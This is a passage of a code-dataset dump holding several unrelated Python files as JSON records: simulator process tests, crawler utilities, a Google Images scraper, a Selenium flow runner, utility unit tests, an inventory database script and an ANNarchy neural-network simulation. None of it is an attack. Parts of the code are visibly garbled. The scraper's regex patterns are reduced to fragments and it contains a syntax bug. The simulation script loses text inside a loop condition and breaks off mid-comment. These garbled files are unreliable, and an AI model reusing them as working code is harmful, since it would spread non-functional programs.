proc_a):\n time = 10\n\n t_a = proc_a.exc_in(mock_sim, time, lambda: 0)\n\n assert set([t_a]) == proc_a._threads\n assert 1 == proc_a._thread_counter\n\n t_b = proc_a.exc_in(mock_sim, time, lambda: 0)\n assert set([t_a, t_b]) == proc_a._threads\n assert 2 == proc_a._thread_counter\n\n\n@patch(\"itsim.simulator.Simulator\")\ndef test_exc(mock_sim, proc_a):\n t_a = proc_a.exc(mock_sim, lambda: 0)\n assert set([t_a]) == proc_a._threads\n assert 1 == proc_a._thread_counter\n\n t_b = proc_a.exc(mock_sim, lambda: 0)\n assert set([t_a, t_b]) == proc_a._threads\n assert 2 == proc_a._thread_counter\n\n\n@patch(\"itsim.simulator.Simulator\")\n@patch(\"itsim.machine.node.Node\")\n@patch(\"itsim.machine.process_management.process.Process\")\ndef test_thread_complete(mock_sim, mock_node, mock_proc):\n proc = Process(0, mock_node, mock_proc)\n t_a = proc.exc(mock_sim, lambda: 0)\n\n proc.thread_complete(t_a)\n assert set([]) == proc._threads\n assert 1 == proc._thread_counter\n mock_proc.child_complete.assert_called_with(proc)\n mock_node.proc_exit.assert_called_with(proc)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_parent_child_relationship(mock_node):\n parent = Process(0, mock_node)\n kid = Process(1, mock_node, parent)\n assert parent._parent is None\n assert kid._parent is parent\n assert parent._children == {kid}\n assert len(kid._children) == 0\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_fork_exec(mock_node):\n proc = Process(0, mock_node)\n sim = Simulator()\n proc.exc(sim, lambda: None)\n\n def f():\n pass\n\n kid = proc.fork_exec(f)\n mock_node.run_proc_in.assert_called_with(sim, 0, f)\n assert proc == kid._parent\n assert {kid} == proc._children\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_fork_exec_args(mock_node):\n proc = Process(0, mock_node)\n sim = Simulator()\n proc.exc(sim, lambda: None)\n\n def f():\n pass\n\n args = (1, 2, 3)\n kwargs = {\"a\": 0, \"b\": 1}\n kid = proc.fork_exec(f, *args, **kwargs)\n mock_node.run_proc_in.assert_called_with(sim, 0, f, *args, **kwargs)\n assert proc == kid._parent\n assert {kid} == proc._children\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_child_complete(mock_node):\n parent = Process(0, mock_node)\n parent.exc(Simulator(), lambda: 0)\n kid = parent.fork_exec(lambda: 0)\n parent.child_complete(kid)\n assert set() == parent._children\n\n\ndef run_process_wait_test(timeout, expected, has_thread=True, delay_before_wait=0):\n with patch(\"itsim.machine.node.Node\") as mock_node:\n def thread_behaviour(context: Context):\n advance(10)\n\n sim = Simulator()\n proc = Process(1234, mock_node)\n if has_thread:\n proc.exc(sim, thread_behaviour)\n log = []\n\n def wait_for_proc():\n advance(delay_before_wait)\n try:\n proc.wait(timeout)\n log.append(\"complete\")\n except Timeout:\n log.append(\"timeout\")\n\n sim.add(wait_for_proc)\n sim.run()\n\n assert log == [expected]\n\n\ndef test_process_wait_no_more_thread():\n run_process_wait_test(None, \"complete\", True, 20)\n\n\ndef test_process_wait_complete_no_timeout():\n run_process_wait_test(None, \"complete\")\n\n\ndef test_process_wait_complete_with_timeout():\n run_process_wait_test(20, \"complete\")\n\n\ndef test_process_wait_timeout():\n run_process_wait_test(5, \"timeout\")\n\n\ndef test_process_wait_no_thread_not_started():\n run_process_wait_test(100, \"timeout\", False)\n\n\n@patch(\"itsim.machine.node.Node\")\ndef test_process_is_alive(mock_node):\n DELAY = 20\n is_running = False\n\n def f(_):\n nonlocal is_running\n is_running = True\n advance(DELAY)\n\n sim = Simulator()\n proc = Process(1234, mock_node)\n assert proc.is_alive()\n thread = Thread(sim, proc, 0)\n assert proc.is_alive()\n thread.run(f)\n assert proc.is_alive()\n sim.run(DELAY / 2)\n assert is_running\n assert proc.is_alive()\n sim.run()\n assert not proc.is_alive()\n\n\ndef run_test_kill(delays_threads, delay_kill, delay_join, expect_alive_after_kill):\n with patch(\"itsim.machine.node.Node\") as mock_node:\n log = []\n\n def f(_, delay):\n try:\n advance(delay)\n except ThreadKilled:\n raise\n except Exception:\n fail(\"Thread ended with other interrupt than ThreadKilled.\")\n\n def waiter(p):\n advance(delay_join)\n p.wait()\n for thread in p._threads:\n assert not thread.is_alive()\n assert not p.is_alive()\n log.append(\"waiter\")\n\n def killer(p):\n advance(delay_kill)\n p.kill()\n assert p.is_alive() == expect_alive_after_kill\n log.append(\"killer\")\n\n sim = Simulator()\n proc = Process(1234, mock_node)\n for delay in delays_threads:\n proc.exc(sim, f, delay)\n sim.add(waiter, proc)\n sim.add(killer, proc)\n sim.run()\n assert log == [\"killer\", \"waiter\"]\n\n\ndef test_kill_no_thread():\n run_test_kill([], 10, 11, False)\n\n\ndef test_kill_dead():\n run_test_kill([10], 20, 30, False)\n\n\ndef test_kill_live_trigger_wait():\n run_test_kill([100], 10, 0, True)\n\n\ndef test_kill_live_two_threads():\n run_test_kill([100, 200], 10, 0, True)\n\n\ndef test_kill_live_one_thread_done():\n run_test_kill([10, 200], 20, 0, True)\n\n\ndef test_kill_live_wait_after():\n run_test_kill([100], 10, 20, True)\n","sub_path":"tests/machine/process_management/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"325009005","text":"import os\r\nimport logging\r\nfrom hashlib import sha256\r\nfrom urllib.parse import urlparse\r\n\r\nclass UrlInfo(object):\r\n def __init__(self, url, completed = False, wordCount = 0):\r\n self.url = url\r\n self.completed = completed\r\n self.wordCount = wordCount\r\n \r\ndef get_logger(name, filename=None):\r\n logger = logging.getLogger(name)\r\n logger.setLevel(logging.INFO)\r\n if not os.path.exists(\"Logs\"):\r\n os.makedirs(\"Logs\")\r\n fh = logging.FileHandler(f\"Logs/{filename if filename else name}.log\")\r\n fh.setLevel(logging.DEBUG)\r\n ch = logging.StreamHandler()\r\n ch.setLevel(logging.INFO)\r\n formatter = logging.Formatter(\r\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\r\n fh.setFormatter(formatter)\r\n ch.setFormatter(formatter)\r\n # add the handlers to the logger\r\n logger.addHandler(fh)\r\n logger.addHandler(ch)\r\n return logger\r\n\r\n\r\ndef get_urlhash(url):\r\n parsed = urlparse(url)\r\n # everything other than scheme.\r\n return sha256(\r\n f\"{parsed.netloc}/{parsed.path}/{parsed.params}/\"\r\n f\"{parsed.query}/{parsed.fragment}\".encode(\"utf-8\")).hexdigest()\r\n\r\ndef normalize(url):\r\n # trim out url fragment\r\n parts = url.rsplit('/', 1)\r\n if len(parts) == 2:\r\n left, right = parts\r\n posi = right.find('#')\r\n\r\n # # trim query ??\r\n # posi1 = right.find('?', 0, posi)\r\n # if posi1 != -1 and posi1 < posi:\r\n # posi = posi1\r\n\r\n if posi != -1:\r\n url = left + '/' + right[:posi]\r\n \r\n if url.endswith(\"/\"):\r\n return url.rstrip(\"/\")\r\n return url","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"278755918","text":"import os\r\nimport sys\r\nimport re\r\nimport requests\r\nimport time\r\n\r\ndef my_fetch(url, follow):\r\n\tif (follow == True):\r\n\t\theaders = {\r\n\t\t\t'User-Agent': 'Mozilla/4.0 (compatible; MSIE5.01; Windows NT 5.0)',\r\n\t\t\t'referer': 'http://www.google.com/'\r\n\t\t}\r\n\t\trequest = requests.get(url, headers=headers, allow_redirects=True)\r\n\telse:\r\n\t\trequest = requests.get(url)\r\n\ttime.sleep(.1)\r\n\treturn request.text\r\n\r\ndef get_images_url(request, language):\r\n\tsubject = my_fetch('http://www.google.com/search?hl='+language+'&q='+request, False)\r\n\tpattern = 'Images';\r\n\tmatches = re.search(pattern, subject)\r\n\treturn (matches.group(1));\r\n\r\ndef get_images(request, language):\r\n\timages_url = get_images_url(request, language)\r\n\tsubject = my_fetch(images_url, True)\r\n\tpattern = '(.*?)<\\/table>'\r\n\tmatches = re.search(pattern, subject)\r\n\tsubject = matches.group(0)\r\n\tpattern = ''\r\n\tmatches = re.findall(pattern, subject)\r\n\treturn (matches)\r\n\r\ndef setup_personality(directory, name):\r\n\tfolder = directory\r\n\tif not os.path.exists(folder):\r\n\t\tos.makedirs(folder)\r\n\tfolder += '/'+name\r\n\tif not os.path.exists(folder):\r\n\t\tos.makedirs(folder)\r\n\treturn (folder)\r\n\r\ndef add_personality_extra(directory, name, language, extra):\r\n\tfolder = setup_personality(directory, name)\r\n\tfd = open(folder+'/urls.txt', 'w')\r\n\tif (extra != False):\r\n\t\turls = get_images('\"'+name+'\" '.extra, language)\r\n\telse:\r\n\t\turls = get_images('\"'+name+'\"', language)\r\n\ti = 0\r\n\tfor url in urls:\r\n\t\timage_fd = open(folder+'/image_'+str(i)+'.jpg', 'w')\r\n\t\tfd.write(url+'\\n')\r\n\t\tr = requests.get(url)\r\n\t\tif r.status_code == 200:\r\n\t\t\tfor chunk in r:\r\n\t\t\t\timage_fd.write(chunk)\r\n\t\timage_fd.close()\r\n\t\ti += 1\r\n\tfd.close()\r\n\r\ndef add_personality(directory, name, language):\r\n\tadd_personality_extra(directory, name, language, False)\r\n\r\nif __name__ == '__main__':\r\n\tadd_personality(sys.argv[1], sys.argv[2], sys.argv[3])\r\n","sub_path":"scripts/scripts/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"186114322","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass ProcessadorDeFluxos():\n\n\tdef run(fluxo, parametros):\n\n\t\tchrome_options = Options()\n\t\tchrome_options.add_argument('--headless')\n\n\t\tdriver = webdriver.Chrome(chrome_options=chrome_options)\n\n\t\tsaida = None\n\t\tdriver.get(fluxo.url_inicial)\n\t\tindice = 0\n\t\tacoes = fluxo.acoes.all()\n\t\tfor acao in acoes:\n\t\t\telement = driver.find_element_by_xpath(acao.xpath)\n\t\t\tif acao.tipo == 'input':\n\t\t\t\telement.send_keys(parametros[indice])\n\t\t\t\tindice = indice + 1\n\t\t\tif acao.tipo == 'button':\n\t\t\t\telement.click()\n\t\t\tif acao.tipo == 'select':\n\t\t\t\tmen_menu = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, acao.xpath)))\n\t\t\t\tActionChains(driver).move_to_element(men_menu).perform()\n\t\t\tif acao.tipo == 'output':\n\t\t\t\tsaida = element.get_attribute('innerHTML')\n\n\t\t# driver.save_screenshot('image.png')\n\t\tdriver.close()\n\t\treturn saida\n\n\n\n\n\n","sub_path":"actuators/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"60891354","text":"# -*- coding: utf-8 -*-\nimport click\nimport os\nimport pytest\nimport subprocess\nimport tempfile\nimport zazu.util\ntry:\n import __builtin__ as builtins # NOQA\nexcept ImportError:\n import builtins # NOQA\n\n__author__ = \"Nicholas Wiles\"\n__copyright__ = \"Copyright 2016\"\n\n\ndef touch_file(path):\n with open(path, 'w'):\n pass\n\n\ndef test_scan_tree():\n dir = tempfile.mkdtemp()\n exclude_dir = os.path.join(dir, 'exclude')\n os.mkdir(exclude_dir)\n exclude_file = os.path.join(exclude_dir, 'excluded_file.yes')\n include_file = os.path.join(dir, 'file.yes')\n extra_file = os.path.join(dir, 'file.no')\n touch_file(exclude_file)\n touch_file(extra_file)\n results = zazu.util.scantree(dir, ['*.yes'], ['exclude'], exclude_hidden=True)\n assert not results\n touch_file(include_file)\n results = zazu.util.scantree(dir, ['*.yes'], ['exclude'], exclude_hidden=True)\n assert len(results) == 1\n assert os.path.relpath(include_file, dir) in results\n\n\ndef test_check_output(mocker):\n mocker.patch('subprocess.check_output', side_effect=OSError(''))\n with pytest.raises(click.ClickException):\n zazu.util.check_output(['foo'])\n subprocess.check_output.assert_called_once_with(['foo'])\n\n\ndef test_call(mocker):\n mocker.patch('subprocess.call', side_effect=OSError(''))\n with pytest.raises(click.ClickException):\n zazu.util.call(['foo'])\n subprocess.call.assert_called_once_with(['foo'])\n\n\ndef test_check_popen_not_found(mocker):\n mocker.patch('subprocess.Popen', side_effect=OSError(''))\n with pytest.raises(click.ClickException):\n zazu.util.check_popen(['foo'])\n subprocess.call.assert_called_once_with(['foo'])\n\n\ndef test_check_popen(mocker):\n mocked_process = mocker.Mock()\n mocked_process.communicate = mocker.Mock(return_value=('out', 'err'))\n mocker.patch('subprocess.Popen', return_value=mocked_process)\n mocked_process.returncode = 0\n assert 'out' == zazu.util.check_popen(stdin_str='input', args=['foo'])\n subprocess.Popen.assert_called_once_with(args=['foo'], stderr=subprocess.PIPE,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n mocked_process.communicate.assert_called_once_with('input')\n with pytest.raises(subprocess.CalledProcessError) as e:\n mocked_process.returncode = 1\n zazu.util.check_popen(stdin_str='input', args=['foo'])\n assert e.value.returncode == 1\n assert e.value.cmd == ['foo']\n assert e.value.output == 'err'\n\n\ndef call(*args, **kwargs):\n try:\n return subprocess.call(*args, **kwargs)\n except OSError:\n raise_uninstalled(args[0][0])\n\n\ndef test_pprint_list():\n list = ['a', 'b', 'c']\n formatted = zazu.util.pprint_list(list)\n expected = '\\n - a\\n - b\\n - c'\n assert expected == formatted\n\n\ndef test_raise_uninstalled():\n with pytest.raises(click.ClickException):\n zazu.util.raise_uninstalled('foo')\n\n\ndef test_prompt_default(monkeypatch):\n monkeypatch.setattr('builtins.input', lambda x: '')\n expected = 'bar'\n assert zazu.util.prompt('foo', expected) == expected\n\n\ndef test_prompt_overide_default(monkeypatch):\n expected2 = 'baz'\n monkeypatch.setattr('builtins.input', lambda x: expected2)\n assert zazu.util.prompt('foo', 'bar') == expected2\n\n\ndef test_prompt(monkeypatch):\n expected2 = 'baz'\n monkeypatch.setattr('builtins.input', lambda x: expected2)\n assert zazu.util.prompt('foo') == expected2\n with pytest.raises(ValueError):\n zazu.util.prompt('foo', expected_type=int)\n\n\ndef test_pick_empty():\n assert zazu.util.pick([], 'foo') is None\n\n\ndef test_pick_single():\n choices = ['one']\n assert zazu.util.pick(choices, 'foo') == choices[0]\n\n\ndef test_pick(monkeypatch):\n choices = ['one', 'two']\n monkeypatch.setattr('inquirer.prompt', lambda x: {' ': choices[0]})\n assert zazu.util.pick(choices, 'foo') == choices[0]\n\n\ndef test_pick_interupted(monkeypatch):\n choices = ['one', 'two']\n monkeypatch.setattr('inquirer.prompt', lambda x: None)\n with pytest.raises(KeyboardInterrupt):\n zazu.util.pick(choices, 'foo')\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"27715108","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nstartTime = datetime.now()\ndef jobdesc(givenUrl,session):\n details=\"\"\n nexturl = \"https://in.indeed.com\"+givenUrl\n nextpage = session.get(nexturl)\n soupnext = BeautifulSoup(nextpage.content, \"html.parser\")\n for p in soupnext.find_all(name=\"div\",attrs={\"class\":\"jobsearch-jobDescriptionText\"}):\n details= details+\" \"+p.text\n return details.strip()\n \n\nURL = \"https://in.indeed.com/jobs?q&l=india&sort=date&vjk=38f72defe4a4fef1\"\npage = requests.get(URL)\n\n# print(page.text)\nsoup = BeautifulSoup(page.content, \"html.parser\")\nsession = requests.Session()\n# print(soup.prettify())\njobs = []\njobdetails =[]\nfor div0 in soup.find_all(name=\"div\",attrs={\"class\":\"mosaic-zone\"}):\n for a in div0.find_all(name=\"a\" , attrs={\"data-hide-spinner\":\"true\"}):\n if(a['href']!=''):\n jobdetails.append(jobdesc(a['href'],session)) \n # print(a['href']+\" \"+\"end\"+\"\\n\")\n for div in div0.find_all(name=\"div\", attrs={\"class\":\"job_seen_beacon\"}):\n for div1 in div.find_all(name=\"div\", attrs={\"class\":\"heading6 company_location tapItem-gutter\"}):\n for pre in div1.find_all(name=\"pre\"):\n for span in pre.find_all(name=\"span\",attrs={\"class\":\"companyName\"}):\n jobs.append(span.text)\n # print(span.text)\nimport pandas as pd\ndata_frame= pd.DataFrame({'Company Name':jobs,'Job Details': jobdetails})\n\n\nprint(datetime.now()-startTime)\n","sub_path":"indeed_bs4.py","file_name":"indeed_bs4.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610288939","text":"#!/usr/bin/env python\n\nimport xlwings\nimport pyodbc\nimport json\nimport sys\nimport re\n\nlocPattern = re.compile(r'^[A-Za-z#][0-9]')\nt_py = '\\\\\\\\HSSIENG\\\\HSSEDSSERV\\\\SNData\\\\python'\nwith open(f'{t_py}\\\\utils\\\\_data\\\\paths.json', 'r') as p:\n paths = json.loads(p.read())\n\n\ndef getInventory(args):\n conn = pyodbc.connect(f\"{paths['ca_cs']}DATABASE=SNDBase91\")\n cur = conn.cursor()\n\n # database stuff\n header = [\n 'Loc', 'HERE', 'Sheet', 'Heat#',\n 'SAP MM', 'Qty', 'Thk', 'Wid', 'Length', 'PO#', 'WBS',\n 'Type'\n ]\n _temp = []\n dualCert = {}\n for arg in args:\n if arg[:2] == 'TR':\n arg = '#%'\n elif locPattern.match(arg) is None and arg!='LM':\n arg += '%'\n cur.execute(\"\"\"\n SELECT\n Location, '', SheetName, HeatNumber,\n PrimeCode, Qty, Thickness, Width, Length, BinNumber, Mill,\n SheetType\n FROM Stock WHERE Location LIKE ? AND SheetName LIKE 'S%'\n \"\"\", arg)\n for x in cur.fetchall():\n if list(x) not in _temp:\n # if x[4][:7] == '50/50W-' and x[-1] == 0:\n if (x[4][:7] == '50/50W-' or x[4][:2] != '9-') and x[-1] == 0:\n key = (x[0], x[4])\n if key not in dualCert.keys():\n dualCert[key] = 0\n dualCert[key] += x[5]\n else:\n _temp.append(list(x))\n\n conn.close()\n\n def dualCertLine(key, qty):\n return [key[0], '', '', '', key[1], qty, '', '', '', '', '', 0]\n _temp.extend([dualCertLine(k, v) for k, v in dualCert.items()])\n\n def sortLoc(x):\n try:\n return (x[0], int(x[1:]))\n except ValueError:\n return (x[0], x[1:])\n\n wb = xlwings.Book()\n wb.sheets[0].range('A1').value = header\n wb.sheets[0].range('A2').value = sorted(_temp, key=lambda x: sortLoc(x[0]))\n wb.sheets[0].autofit()\n\n\ndef update(mm, oldLoc, newLoc):\n conn = pyodbc.connect(f\"{paths['ca_cs']}DATABASE=SNDBase91\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n UPDATE Stock SET Location=?\n WHERE PrimeCode=? AND Location=?\n \"\"\", newLoc, mm, oldLoc)\n print(f\"Updating {mm} in {oldLoc} to be in {newLoc}\")\n cur.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if not args:\n print('No args given')\n if any([len(x) > 4 for x in args]):\n if len(args) != 4:\n print('Incorrect number of arguments, should be SAP MM, old location and new location')\n else:\n update(*args[1:])\n else:\n getInventory([x.upper() for x in args])\n","sub_path":"sndb/old/inv.py","file_name":"inv.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"572458640","text":"\"\"\"\n Cognitive, Learning Agent\n Author: Alex Schwarz, Oliver Maith\n\"\"\"\nimport ANNarchy as ann\nimport sys\nimport os\nimport pylab as plt\nimport numpy as np\nnp.random.seed()\nimport itertools\n\nfrom Network_Visual import V1, V4L23, V4L4, FEFv, FEFvm, FEFm, AuxE\nfrom Network_BG import IT, PFC, StrD1, StrD2, PPTN, STN, GPe, SNr, MD, StrThal, ITStrD1, ITStrD2, SNc, DAPrediction, StrD1StrD1, StrD2StrD2, STNSTN, StrD1SNr, ITSTN, StrD2GPe, STNSNr, SNrSNr, StrThalGPe, StrThalSNr, MDStrThal, SNrMD, ITPFC, VAPFC, PFCPFC, GPeSNr, StrThalStrThal, PFCMD, StrD1SNc\nfrom Connections import one_to_dim, dim_to_one\nfrom parameters import params\nfrom changed_val import changeParams, changed\nfrom timeit import default_timer as timer\nSIMULATIONSSTART=timer()\nsimID=sys.argv[1]\ntrainStimID=int(sys.argv[2])# 0-t1, 1-t1rev\n\nMaxPooling = ann.Synapse(\n psp = \"w * pre.r\",\n operation = \"max\"\n)\nMinPooling = ann.Synapse(\n psp = \"w * pre.r\",\n operation = \"min\"\n)\n\n\ndef addConn():\n\t\"\"\" Add interconnections \"\"\"\n\t### Connection from prefrontal Cortex to V4 L2/3 (layerwise amplification) ###\n\tPFC_V4L23 = ann.Projection(PFC, V4L23, target='A_PFC', synapse=StandardSynapse)\n\tPFC_V4L23.connect_with_func(one_to_dim, postDim=2, weight=changed['PFC_V4L23.w'])\n\n\t### Connection from V4 L2/3 to IT ###\n\tV4L23_IT = ann.Projection(V4L23, IT, target='exc', synapse=MaxPooling)\n\tV4L23_IT.connect_with_func(dim_to_one, preDim=2, weight=4.0)\n\n\t### Connection from IT to Thalamus (ext for thalamus -> possible \"actions\") ###\n\tITMD = ann.Projection(IT,MD,target='exc', synapse=StandardSynapse)\n\tITMD.connect_gaussian(amp=0.1, sigma=0.1, allow_self_connections=True)\n\n\n\nif __name__ == '__main__':\n\n\n\t#####################################################\n\t##### ADJUST PARAMETERS AND ADD CONNECTIONS ######\n\t#####################################################\n\taddConn()\n\tchangeParams(1)\n\n\n\t#####################################################\n\t################### COMPILE ######################\n\t#####################################################\n\tparallelAnz=10\n\tif(int(simID)%parallelAnz!=0):\n\t\tcompNr=int(simID)%parallelAnz\n\telse:\n\t\tcompNr=parallelAnz\n\tann.compile(directory=\"annarchy_sim\"+str(compNr+[0,8,0][trainStimID]))\n\t\n\n\t#####################################################\n\t############## PREPARE SIMULATION ################\n\t#####################################################\n\tMAXSIMULATIONSZEIT=3600*24\n\tmaxTrainingTrials=60\n\ttrainStim=['t1','t1Reversed'][trainStimID]\n\ttestStim='t2'\n\ttMaxtrainStim=1000\n\ttMaxtestStim=300\n\tintertrial=500\n\tdopDelay=0\n\tnumDifStims=450\n\tBlockLength=50\n\ttrainStim_Anz=0\n\ttestStim_Anz=1\n\tmaxTrials=maxTrainingTrials+trainStim_Anz+testStim_Anz\n\t### LOAD STIMULI ###\n\tInput = np.zeros((numDifStims, params['V1_shape'][0], params['V1_shape'][1], params['V1_shape'][2], params['V1_shape'][3]))\n\tInput_img = np.zeros((numDifStims, params['V1_shape'][0], params['V1_shape'][1]))\n\tInput_lineCoords = []\n\tInput_phi = []\n\tfor stim_nbr in np.arange(numDifStims):\n\t\tInput[stim_nbr]=np.load(\"new_stims_normal/input\"+str(stim_nbr)+\".npy\")\n\t\tInput_img[stim_nbr]=np.load(\"new_stims_normal/img\"+str(stim_nbr)+\".npy\")\n\t\tInput_lineCoords.append(np.load(\"new_stims_normal/lineCoords\"+str(stim_nbr)+\".npy\"))\n\t\tInput_phi.append(np.load(\"new_stims_normal/phi\"+str(stim_nbr)+\".npy\"))\n\tdistList=[]\n\n \n\tfolder='2020_11_13_testTrainingsphasen'+['T1','T1rev'][trainStimID]+'/'\n\ttry:\n\t\tos.makedirs('data/'+folder[:-1])\n\texcept:\n\t\tif os.path.isdir('data/'+folder[:-1])==False:\n\t\t\tprint('could not create data/'+folder[:-1]+' folder')\n\n\n\t#####################################################\n\t################### MONITORS ######################\n\t#####################################################\n\tbig_mon_period=50.0\n\tM = [ann.Monitor(V1, 'r', period=big_mon_period),ann.Monitor(V4L4, 'r', period=big_mon_period),ann.Monitor(V4L23, 'r', period=big_mon_period),ann.Monitor(IT, 'r'),ann.Monitor(PFC, 'mp'),ann.Monitor(FEFv, 'r', period=big_mon_period),ann.Monitor(FEFm, 'r', period=big_mon_period),ann.Monitor(StrD1, 'mp'),ann.Monitor(StrD2, 'mp'),ann.Monitor(PPTN, 'mp'),ann.Monitor(STN, 'mp'),ann.Monitor(GPe, 'mp'),ann.Monitor(SNr, 'mp'),ann.Monitor(MD, 'mp'),ann.Monitor(StrThal, 'mp'),ann.Monitor(SNc, 'r'),ann.Monitor(FEFvm, 'r', period=big_mon_period),ann.Monitor(AuxE, 'r', period=big_mon_period),ann.Monitor(FEFv, 'q', period=big_mon_period)]\n\n\tselection=np.zeros((maxTrials,7))\n\t### only use specific monitors --> comment below! ###\n\tuse_monitors=[4]\n\tfor idxA in range(len(M)):\n\t\tuse=0\n\t\tfor idxB in use_monitors:\n\t\t\tif idxA==idxB:\n\t\t\t\tuse=1\n\t\tif use==0:\n\t\t\tM[idxA].pause()\n\t\n\t### monitor for weights or only weights per trial ###\n\tmonitorWeights=0\n\tweight_mon_period=5.0\n\tif monitorWeights==1:\n\t\tmon_w_ITStrD1=ann.Monitor(ITStrD1, 'w', period=weight_mon_period)\n\t\tmon_w_ITStrD2=ann.Monitor(ITStrD2, 'w', period=weight_mon_period)\n\t\tmon_w_ITSTN=ann.Monitor(ITSTN, 'w', period=weight_mon_period)\n\t\tmon_w_StrD2GPe=ann.Monitor(StrD2GPe, 'w', period=weight_mon_period)\n\t\tmon_w_StrD1SNr=ann.Monitor(StrD1SNr, 'w', period=weight_mon_period)\n\t\tmon_w_STNSNr=ann.Monitor(STNSNr, 'w', period=weight_mon_period)\n\t\tmon_w_ITPFC=ann.Monitor(ITPFC, 'w', period=weight_mon_period)\n\t\tmon_w_VAPFC=ann.Monitor(VAPFC, 'w', period=weight_mon_period)\n\t\tmon_w_StrD1SNc=ann.Monitor(StrD1SNc, 'w', period=weight_mon_period)\n\telse:\n\t\tw_ITStrD1=np.zeros((maxTrials,np.array(ITStrD1.w).shape[0],np.array(ITStrD1.w).shape[1]))\n\t\tw_ITStrD2=np.zeros((maxTrials,np.array(ITStrD2.w).shape[0],np.array(ITStrD2.w).shape[1]))\n\t\tw_ITSTN=np.zeros((maxTrials,np.array(ITSTN.w).shape[0],np.array(ITSTN.w).shape[1]))\n\t\tw_StrD2GPe=np.zeros((maxTrials,np.array(StrD2GPe.w).shape[0],np.array(StrD2GPe.w).shape[1]))\n\t\tw_StrD1SNr=np.zeros((maxTrials,np.array(StrD1SNr.w).shape[0],np.array(StrD1SNr.w).shape[1]))\n\t\tw_STNSNr=np.zeros((maxTrials,np.array(STNSNr.w).shape[0],np.array(STNSNr.w).shape[1]))\n\t\tw_ITPFC=np.zeros((maxTrials,np.array(ITPFC.w).shape[0],np.array(ITPFC.w).shape[1]))\n\t\tw_VAPFC=np.zeros((maxTrials,np.array(VAPFC.w).shape[0],np.array(VAPFC.w).shape[1]))\n\t\tw_StrD1SNc=np.zeros((maxTrials,np.array(StrD1SNc.w).shape[0],np.array(StrD1SNc.w).shape[1]))\n\n\n\t#####################################################\n\t################## SIMULATION ####################\n\t#####################################################\n\tSNc.alpha=0\n\tPPTN.B=0\n\tstartTrial=0\n\tann.simulate(300)\n\ttraining=1\n\ttrial=0\n\tBlockTrial=0\n\tnumCorrect=0\n\twhile ((training==1 and trial20:\n\t\t\t\tif trainStim=='justT' or trainStim=='justD':\n\t\t\t\t\t### after 20 trials stop training ###\n\t\t\t\t\ttraining=0\n\t\t\t\t\tstimuliBlock=np.concatenate((np.ones(trainStim_Anz),np.ones(testStim_Anz)*2))\n\t\t\t\t\tnp.random.shuffle(stimuliBlock)\n\t\t\t\telse:\n\t\t\t\t\t### min 16 of 20 last correct = 80% --> stop training ###\n\t\t\t\t\tif selection[trial-20:trial,4].sum()>=16:\n\t\t\t\t\t\ttraining=0\n\t\t\t\t\t\tstimuliBlock=np.concatenate((np.ones(trainStim_Anz),np.ones(testStim_Anz)*2))\n\t\t\t\t\t\tnp.random.shuffle(stimuliBlock)\n\t\telse:\n\t\t\tif stimuliBlock[BlockTrial]==1:\n\t\t\t\tstimulus=trainStim\n\t\t\telse:\n\t\t\t\tstimulus=testStim\n\t\t\tBlockTrial+=1\n\n\t\t### Input dependent on stimulus ###\n\t\tif stimulus=='t1':\n\t\t\tI=np.random.randint(0,49)+50*0\n\t\telif stimulus=='t2':\n\t\t\tI=np.random.randint(0,49)+50*1\n\t\telif stimulus=='standard':\n\t\t\tI=np.random.randint(0,49)+50*2\n\t\telif stimulus=='justT':\n\t\t\tI=np.random.randint(0,49)+50*3\n\t\telif stimulus=='justD':\n\t\t\tI=np.random.randint(0,49)+50*4\n\t\telif stimulus=='heterogenD':\n\t\t\tI=np.random.randint(0,49)+50*5\n\t\telif stimulus=='linearSep':\n\t\t\tI=np.random.randint(0,49)+50*6\n\t\telif stimulus=='t1Reversed':\n\t\t\tI=np.random.randint(0,49)+50*7\n\t\telif stimulus=='kerzel':\n\t\t\tI=np.random.randint(0,49)+50*8\n\t\tV1.B = Input[I]\n\t\ttargetOrientation=Input_phi[I][-1]\n\t\tif stimulus=='justD':\n\t\t\ttargetOrientation=999\n\n\n\t\t### SIMULATE UNTIL ###\n\t\tif stimulus==trainStim:\n\t\t\ttMax=tMaxtrainStim\n\t\telse:\t\n\t\t\ttMax=tMaxtestStim\n\t\tr = ann.simulate_until(max_duration=tMax, population=FEFm)\n\t\t\n\t\t### decision of FEFm = Number of neuron ###\n\t\tdecision = int(np.max(FEFm.decision))\n\t\tif decision<0:\n\t\t\tdecision=np.array(FEFm.r).argmax()\n\t\t### convert number of FEFm (decision) Neuron into Position (decisionPos) 